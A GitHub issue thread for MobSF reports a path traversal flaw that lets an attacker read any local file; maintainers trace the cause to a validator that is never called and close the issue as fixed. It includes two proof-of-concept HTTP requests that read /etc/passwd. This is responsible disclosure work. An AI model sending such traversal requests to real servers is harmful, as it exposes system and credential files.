Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[Security] Local file reading regression < 3.0.0 #1197

Closed
legik opened this issue Dec 9, 2019 · 5 comments · Fixed by #1198
Closed

[Security] Local file reading regression < 3.0.0 #1197

legik opened this issue Dec 9, 2019 · 5 comments · Fixed by #1198
Labels
security Security issues in MobSF

Comments

@legik
Copy link

legik commented Dec 9, 2019

ENVIRONMENT

Docker latest version

EXPLANATION OF THE ISSUE

It is possible to read any file on the system.

STEPS TO REPRODUCE THE ISSUE

1st poc (specify absolute path):

GET /ViewFile/?file=/etc/passwd&md5=376a1470cd79dc44a96615337c5b51c2&type=ios HTTP/1.1
Host: 0.0.0.0:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3971.0 Safari/537.36 autochrome/blue
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

2nd poc (specify path instead of real md5):

GET /ViewFile/?file=etc/passwd&md5=../../../../../../../../../..///&type=ios HTTP/1.1
Host: 0.0.0.0:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3971.0 Safari/537.36 autochrome/blue
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
@ajinabraham ajinabraham added the security Security issues in MobSF label Dec 9, 2019
@ajinabraham ajinabraham changed the title Local file reading [Security] Local file reading Dec 9, 2019
@ajinabraham
Copy link
Member

Thanks for reporting we are taking a look at this.

@ajinabraham
Copy link
Member

@magaofei Why is this not respected?
https://github.com/MobSF/Mobile-Security-Framework-MobSF/blob/master/StaticAnalyzer/forms.py#L81

@ajinabraham
Copy link
Member

@legik We have checks in code but for some reason thats not respected. Looking into the root cause.

@ajinabraham
Copy link
Member

@magaofei It looks like clean_hash function is not getting called.

@sydowma sydowma mentioned this issue Dec 9, 2019
Merged
3 tasks
ajinabraham added a commit that referenced this issue Dec 9, 2019
@ajinabraham
Fix Security issue #1197
2a74243 
This fixes form validation.
We need one more issue specific to path validation.
ajinabraham added a commit that referenced this issue Dec 9, 2019
@ajinabraham
Fix #1197 - Security Issue Path Traversal
030d0f2
@ajinabraham
Copy link
Member

Fixed in latest master.

@anantshri anantshri mentioned this issue Dec 12, 2019
Closed
@ajinabraham ajinabraham changed the title [Security] Local file reading [Security] Local file reading < 3.0.0 Jun 19, 2020
@ajinabraham ajinabraham changed the title [Security] Local file reading < 3.0.0 [Security] Local file reading regression < 3.0.0 Jun 19, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
security Security issues in MobSF
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

fix form clean method sydowma/Mobile-Security-Framework-MobSF
2 participants
@legik @ajinabraham